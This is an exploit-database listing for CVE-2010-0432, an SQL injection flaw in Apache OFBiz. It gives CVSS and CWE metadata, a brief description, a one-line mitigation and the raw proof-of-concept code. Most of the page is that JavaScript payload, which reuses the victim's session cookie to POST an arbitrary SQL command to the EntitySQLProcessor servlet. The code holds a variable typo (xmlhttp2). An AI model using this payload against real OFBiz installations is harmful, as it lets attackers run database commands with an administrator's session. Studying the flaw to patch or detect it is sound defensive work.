header-logo
Suggest Exploit
vendor:
OFBiz
by:
Lucas Apa
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: OFBiz
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-0432
CPE: a:apache:ofbiz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2010

Apache OFBiz SQL Remote Execution PoC Payload

This exploit allows an attacker to execute arbitrary SQL commands on the vulnerable Apache OFBiz application. The exploit is triggered by sending a specially crafted POST request to the EntitySQLProcessor servlet, which contains the malicious SQL command. The malicious command is then executed by the application.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

/*

Apache OFBiz SQL Remote Execution PoC Payload.

CVE: CVE-2010-0432

By: Lucas Apa ( lucas -at- bonsai-sec.com ).

Bonsai Information Security

http://www.bonsai-sec.com/

*/

var cmd = 'command';

var xmlhttp=false;
try {
xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (E) {
xmlhttp = false;
}
}

if (!xmlhttp && typeof XMLHttpRequest!='undefined') {
try {
xmlhttp = new XMLHttpRequest();
} catch (e) {
xmlhttp=false;
}
}
if (!xmlhttp && window.createRequest) {
try {
xmlhttp = window.createRequest();
} catch (e) {
xmlhttp=false;
}
}

xmlhttp.open("POST", "
https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);
xmlhttp.onreadystatechange=function() {
if (xmlhttp2.readyState==4) {
//alert(xmlhttp.responseText)
}
}

var cookie = unescape(document.cookie);
xmlhttp.setRequestHeader("content-type",
"application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("cookie", cookie);
var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
var post_data = str1+cmd+str2;
xmlhttp.send(post_data);

Navigation

Suggest Exploit

Services By CQR